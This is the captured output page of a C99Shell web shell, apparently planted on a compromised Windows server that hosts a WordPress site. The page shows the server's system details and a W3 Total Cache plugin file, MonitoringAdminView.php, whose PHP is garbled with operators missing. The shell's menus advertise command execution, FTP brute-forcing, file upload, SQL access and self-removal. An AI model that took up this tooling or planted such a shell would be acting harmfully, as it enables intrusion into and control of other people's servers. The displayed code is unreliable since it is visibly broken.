!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\htdocs\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\UI\   drwxrwxrwx
Free 4.95 GB of 239.26 GB (2.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MonitoringAdminView.php (1.42 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (!defined('W3TC')) {
    die();
}

w3_require_once(W3TC_LIB_W3_DIR '/UI/PluginView.php');

class 
W3_UI_MonitoringAdminView extends W3_UI_PluginView {
    
/**
     * Current page
     *
     * @var string
     */
    
var $_page 'w3tc_monitoring';


    
/**
     * New Relic tab
     */
    
function view() {
        
$applications = array();
        
$dashboard '';
        
/**
         * @var $nerser W3_NewRelicService
         */
        
$nerser w3_instance('W3_NewRelicService');
        
$new_relic_configured $this->_config->get_string('newrelic.account_id') &&
            
$this->_config->get_string('newrelic.api_key') &&
            
$this->_config->get_string('newrelic.application_id');
        
$view_application $this->_config->get_string('newrelic.application_id');
        
$new_relic_enabled $this->_config->get_boolean('newrelic.enabled');
        
$verify_running $nerser->verify_running();
        
$application_settings = array();
        if (!
is_array($verify_running)) {
            try {
                
$application_settings $nerser->get_application_settings();
            }catch(
Exception $ex) {
                
$application_settings = array();
            }
        }
        if (
$view_metric W3_Request::get_boolean('view_metric'false)) {
            
$metric_names $nerser->get_metric_names(W3_Request::get_string('regex'''));
        }
        include 
W3TC_INC_DIR '/options/new_relic.php';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--